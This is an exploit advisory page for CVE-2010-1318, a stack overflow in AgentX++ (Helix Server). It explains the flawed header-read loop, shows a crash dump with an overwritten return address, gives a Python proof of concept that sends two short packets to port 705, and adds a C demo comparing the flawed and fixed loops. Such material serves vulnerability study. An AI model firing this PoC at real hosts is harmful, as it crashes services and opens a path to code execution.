Multiple Vendor AgentX++ Stack Buffer Overflow
Source: ZSploit.com  Author: ZSploit  Published: 2010-04-19

# Exploit Title: Multiple Vendor AgentX++ Stack Buffer Overflow Vulnerability
# Date: 2010-04-17
# Author: ZSploit.com
# Software Link: N/A
# Version: N/A
# Tested on: RealNetworks Helix Server v11
# CVE : CVE-2010-1318

#! /usr/bin/env python
###############################################################################
## File       :  zs_agentx_bof.py
## Description:
##            :
## Created_On :  Apr 17 2010
##
## (c) Copyright 2010, ZSploit.com. all rights reserved.
###############################################################################
"""
int AgentX::receive_agentx(int sd, AgentXPdu& pdu)
{

    u_char        buffer[AGENTX_HEADER_LEN+1];                [1]
    u_int        payloadLen;
    boolean        netByteOrder;
    int        status;

    //  read header
    unsigned int bytesRead = 0;
    while (bytesRead < AGENTX_HEADER_LEN) {                     [2]
#ifdef WIN32
        if ((status = recv(sd, (char*)(buffer+bytesRead),
               AGENTX_HEADER_LEN, 0)) <= 0) {

        if (status == 0) return AGENTX_DISCONNECT;
        if (status == SOCKET_ERROR) {
            LOG_BEGIN(ERROR_LOG | 1);
            LOG("AgentX: receive socket error (errno)");
            LOG(WSAGetLastError());
            LOG_END;
            return AGENTX_DISCONNECT;
        }
        else {
            LOG_BEGIN(ERROR_LOG | 1);
            LOG("AgentX: receive unknown error (status)");
            LOG(status);
            LOG_END;
            return AGENTX_DISCONNECT;
        }
        }
#else
        if ((status = read(sd, (void *)(buffer+bytesRead),
                   AGENTX_HEADER_LEN)) <= 0) {

        if (status == 0) return AGENTX_DISCONNECT;
        if (errno == EBADF) return AGENTX_BADF;
        else {
            LOG_BEGIN(ERROR_LOG | 1);
            LOG("AgentX: receive unknown error (errno)");
            LOG(errno);
            LOG_END;
            return AGENTX_ERROR;
        }
        }
#endif
        bytesRead += status;
    }


[1] Allocates a stack buffer of AGENTX_HEADER_LEN+1 bytes (the AgentX PDU header is 0x14 = 20 bytes).
[2] The loop tracks bytesRead, but every recv()/read() still asks for AGENTX_HEADER_LEN bytes at buffer+bytesRead instead of the remaining AGENTX_HEADER_LEN-bytesRead, so the check never bounds the total written into the buffer.

If the first segment carries fewer than AGENTX_HEADER_LEN (0x14) bytes (the PoC sends 0x13 = 19), the loop runs again and the second segment is written at buffer+19 with room for up to 20 more bytes. Two short packets therefore overrun the stack buffer and the saved return address, which is where the eip=41414141 below comes from.

0:009> g
(728.a3c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=fffffff6 ebx=00000000 ecx=00161230 edx=7c8285ec esi=00cbfd14
edi=00ccff80
eip=41414141 esp=00cbfd08 ebp=41414141 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00010202
41414141 ??              ???
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\mswsock.dll -
0:006> k
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
00cbfd04 00edda20 0x41414141
00cbfd18 7c829fb5 0xedda20
00cbfd24 7c829f3d ntdll!RtlGetNtGlobalFlags+0x38
00cbfe0c 71b21a03 ntdll!RtlFreeHeap+0x126
00000000 00000000 mswsock+0x1a03

"""

import sys
import socket

if len(sys.argv) != 2:
    print("Usage:\t%s [target]" % sys.argv[0])
    sys.exit(0)

# 19 bytes (0x13): one short of AGENTX_HEADER_LEN, so the header loop in
# receive_agentx() is still running when the second segment arrives and
# the second read lands at buffer+19 with room for 20 more bytes.
data = b"A" * 19

host = sys.argv[1]
port = 705  # AgentX master agent TCP port

print("PoC for CVE-2010-1318 by ZSploit.com")
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        print("Sending payload ..")
        # Two separate sends: the bug needs the server to see two short
        # reads, not one 38-byte read (TCP may still coalesce them).
        s.send(data)
        s.send(data)
    except socket.error:
        print("Error in send")
    print("Done")
except socket.error:
    print("Error in socket")
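The whole bug is a read loop that knows how many bytes it already has yet still asks for a full header's worth on every iteration. The C program below is an added example written for this page, not code from AgentX++, Helix Server or ZSploit: it reduces the header loop of receive_agentx() to a pure function over a constructed in-memory "socket" that hands back at most one segment per call (modeling the two 19-byte sends of the PoC), places a 0xCC canary right after the 21-byte buffer in place of the saved registers and return address, and runs the loop as written beside a version that bounds each read by the bytes still missing. AGENTX_HEADER_LEN is set to 20 as in RFC 2741; fake_sock, the flat frame layout and the canary are assumptions made for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

#define AGENTX_HEADER_LEN 20   /* AgentX PDU header size (RFC 2741) */
#define CANARY_LEN 32          /* stands in for saved regs / return address */

/* Constructed stand-in for a TCP socket (assumption, not a real fd): `len`
 * payload bytes handed out at most `chunk` per call, which is how two short
 * sends from the peer look to read(2) on the server side. */
typedef struct {
    const uint8_t *data;
    size_t len, pos, chunk;
} fake_sock;

static ssize_t fake_read(fake_sock *s, uint8_t *dst, size_t count)
{
    size_t avail = s->len - s->pos;
    if (avail == 0)
        return 0;                          /* peer closed: AGENTX_DISCONNECT */
    size_t n = avail < count ? avail : count;
    if (n > s->chunk)
        n = s->chunk;
    memcpy(dst, s->data + s->pos, n);
    s->pos += n;
    return (ssize_t)n;
}

/* Header loop as in the advisory ([1], [2]): every read may deposit up to
 * AGENTX_HEADER_LEN bytes at buffer+bytesRead, however little room is left. */
static int recv_header_vuln(fake_sock *s, uint8_t *buffer)
{
    unsigned int bytesRead = 0;
    while (bytesRead < AGENTX_HEADER_LEN) {
        ssize_t status = fake_read(s, buffer + bytesRead, AGENTX_HEADER_LEN);
        if (status <= 0)
            return -1;
        bytesRead += (unsigned int)status;
    }
    return (int)bytesRead;
}

/* Fix: request only the bytes still missing, so the writes can never sum to
 * more than AGENTX_HEADER_LEN no matter how the peer segments the data. */
static int recv_header_fixed(fake_sock *s, uint8_t *buffer)
{
    unsigned int bytesRead = 0;
    while (bytesRead < AGENTX_HEADER_LEN) {
        ssize_t status = fake_read(s, buffer + bytesRead,
                                   AGENTX_HEADER_LEN - bytesRead);
        if (status <= 0)
            return -1;
        bytesRead += (unsigned int)status;
    }
    return (int)bytesRead;
}

typedef int (*header_loop)(fake_sock *, uint8_t *);

/* Model of the frame: the 21-byte header buffer followed by a 0xCC canary.
 * Feed `total` bytes of 'A' in `chunk`-byte segments through `loop`, store the
 * loop's return value in *ret (if non-NULL) and return how many canary bytes
 * were overwritten. The overflow stays inside `frame`, so this is safe to run. */
static size_t canary_clobbered(header_loop loop, size_t total, size_t chunk, int *ret)
{
    uint8_t payload[256];                                 /* constructed input */
    uint8_t frame[AGENTX_HEADER_LEN + 1 + CANARY_LEN];
    uint8_t *canary = frame + AGENTX_HEADER_LEN + 1;
    size_t clobbered = 0;

    if (total > sizeof payload)
        total = sizeof payload;
    memset(payload, 'A', sizeof payload);
    memset(frame, 0, sizeof frame);
    memset(canary, 0xCC, CANARY_LEN);

    fake_sock s = { payload, total, 0, chunk };
    int got = loop(&s, frame);
    if (ret)
        *ret = got;

    for (size_t i = 0; i < CANARY_LEN; i++)
        if (canary[i] != 0xCC)
            clobbered++;
    return clobbered;
}

/* Bytes the loop believes it read for the same scenario. */
static int header_consumed(header_loop loop, size_t total, size_t chunk)
{
    int ret = 0;
    canary_clobbered(loop, total, chunk, &ret);
    return ret;
}

int main(void)
{
    int got;
    /* The PoC: two 19-byte sends, each one short of a full header. */
    size_t d = canary_clobbered(recv_header_vuln, 38, 19, &got);
    printf("vulnerable: consumed %d bytes, %zu canary bytes overwritten\n", got, d);
    d = canary_clobbered(recv_header_fixed, 38, 19, &got);
    printf("fixed:      consumed %d bytes, %zu canary bytes overwritten\n", got, d);
    return 0;
}
```

With the PoC's 19+19 split the unpatched loop accepts 38 bytes into a 21-byte buffer and clobbers 17 bytes past it, while the bounded loop stops at exactly 20; a single 20-byte segment is harmless to both, which is why a naive test that sends the header in one write never sees the bug.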

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved